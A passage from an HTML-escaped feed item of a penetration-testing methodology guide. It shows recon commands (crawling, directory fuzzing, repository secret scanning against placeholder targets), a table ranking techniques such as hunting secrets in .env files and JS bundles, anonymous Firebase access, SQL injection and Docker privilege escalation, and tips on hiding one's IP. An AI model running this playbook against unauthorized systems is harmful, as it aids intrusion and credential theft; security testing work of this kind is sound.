&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;katana -u https://target.com -o urls.txt
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 6. Directory fuzzing&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;ffuf -u https://target.com/FUZZ -w ~/wordlists/common.txt
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 7. Secrets in repositories&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;trufflehog github --repo&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;https://github.com/org/repo
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;hr&gt;
&lt;h2 id="30-technique-effectiveness-summary" &gt;
&lt;div&gt;
&lt;a href="#30-technique-effectiveness-summary"&gt;
#
&lt;/a&gt;
30. TECHNIQUE EFFECTIVENESS SUMMARY
&lt;/div&gt;
&lt;/h2&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Technique&lt;/th&gt;
&lt;th&gt;Yield&lt;/th&gt;
&lt;th&gt;Effort&lt;/th&gt;
&lt;th&gt;Priority&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;.env&lt;/code&gt; + &lt;code&gt;.git&lt;/code&gt; testing&lt;/td&gt;
&lt;td&gt;⭐⭐⭐⭐⭐&lt;/td&gt;
&lt;td&gt;Low&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Do FIRST&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;JS bundle analysis (secrets)&lt;/td&gt;
&lt;td&gt;⭐⭐⭐⭐⭐&lt;/td&gt;
&lt;td&gt;Medium&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Do SECOND&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;CORS misconfig test&lt;/td&gt;
&lt;td&gt;⭐⭐⭐⭐&lt;/td&gt;
&lt;td&gt;Low&lt;/td&gt;
&lt;td&gt;Always test&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Firebase anon access&lt;/td&gt;
&lt;td&gt;⭐⭐⭐⭐⭐&lt;/td&gt;
&lt;td&gt;Low&lt;/td&gt;
&lt;td&gt;If API key found&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Supabase anon access&lt;/td&gt;
&lt;td&gt;⭐⭐⭐⭐⭐&lt;/td&gt;
&lt;td&gt;Low&lt;/td&gt;
&lt;td&gt;If anon key found&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Cloud Functions (no auth)&lt;/td&gt;
&lt;td&gt;⭐⭐⭐⭐⭐&lt;/td&gt;
&lt;td&gt;Low&lt;/td&gt;
&lt;td&gt;If project ID found&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;WordPress REST API + XML-RPC&lt;/td&gt;
&lt;td&gt;⭐⭐⭐⭐&lt;/td&gt;
&lt;td&gt;Low&lt;/td&gt;
&lt;td&gt;If target is WP&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;GitHub code search&lt;/td&gt;
&lt;td&gt;⭐⭐⭐&lt;/td&gt;
&lt;td&gt;Medium&lt;/td&gt;
&lt;td&gt;With personal token&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Web Cache Poisoning&lt;/td&gt;
&lt;td&gt;⭐⭐&lt;/td&gt;
&lt;td&gt;Medium&lt;/td&gt;
&lt;td&gt;If CDN confirmed&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Web Cache Deception&lt;/td&gt;
&lt;td&gt;⭐⭐⭐&lt;/td&gt;
&lt;td&gt;High&lt;/td&gt;
&lt;td&gt;If cache + sensitive data&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Subdomain takeover&lt;/td&gt;
&lt;td&gt;⭐⭐&lt;/td&gt;
&lt;td&gt;Low&lt;/td&gt;
&lt;td&gt;Automatable&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;SA key testing&lt;/td&gt;
&lt;td&gt;⭐⭐⭐&lt;/td&gt;
&lt;td&gt;Medium&lt;/td&gt;
&lt;td&gt;1:30 is valid&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;SQLi (time-based blind)&lt;/td&gt;
&lt;td&gt;⭐⭐⭐&lt;/td&gt;
&lt;td&gt;High&lt;/td&gt;
&lt;td&gt;On all logins&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Docker privesc&lt;/td&gt;
&lt;td&gt;⭐⭐⭐⭐⭐&lt;/td&gt;
&lt;td&gt;Low&lt;/td&gt;
&lt;td&gt;Only if in docker group&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Exposed source maps&lt;/td&gt;
&lt;td&gt;⭐⭐⭐⭐&lt;/td&gt;
&lt;td&gt;Low&lt;/td&gt;
&lt;td&gt;Always check&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Public self-hosted GitLab&lt;/td&gt;
&lt;td&gt;⭐⭐⭐⭐⭐&lt;/td&gt;
&lt;td&gt;Low&lt;/td&gt;
&lt;td&gt;If target has GitLab&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Port scan (RustScan)&lt;/td&gt;
&lt;td&gt;⭐⭐⭐⭐&lt;/td&gt;
&lt;td&gt;Low&lt;/td&gt;
&lt;td&gt;Use on all targets&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Masscan on ranges&lt;/td&gt;
&lt;td&gt;⭐⭐⭐&lt;/td&gt;
&lt;td&gt;Medium&lt;/td&gt;
&lt;td&gt;For /8 or larger&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;hr&gt;
&lt;h3 id="final-words" &gt;
&lt;div&gt;
&lt;a href="#final-words"&gt;
##
&lt;/a&gt;
Final Words
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Golden rules&lt;/strong&gt;:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Document EVERYTHING — what you discover today is tomorrow&amp;rsquo;s path&lt;/li&gt;
&lt;li&gt;One finding leads to another — never stop at the first discovery&lt;/li&gt;
&lt;li&gt;Prioritize impact — CRUD without auth &amp;gt; info disclosure &amp;gt; low severity&lt;/li&gt;
&lt;li&gt;Protect your IP — Tor/proxy-ns, delays, rotating User-Agent&lt;/li&gt;
&lt;li&gt;Be ethical — only test what is in scope and with authorization&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;strong&gt;Continuous update&lt;/strong&gt;: As new techniques are validated in the field, this document should be expanded.&lt;/p&gt;
&lt;hr&gt;</description></item></channel></rss>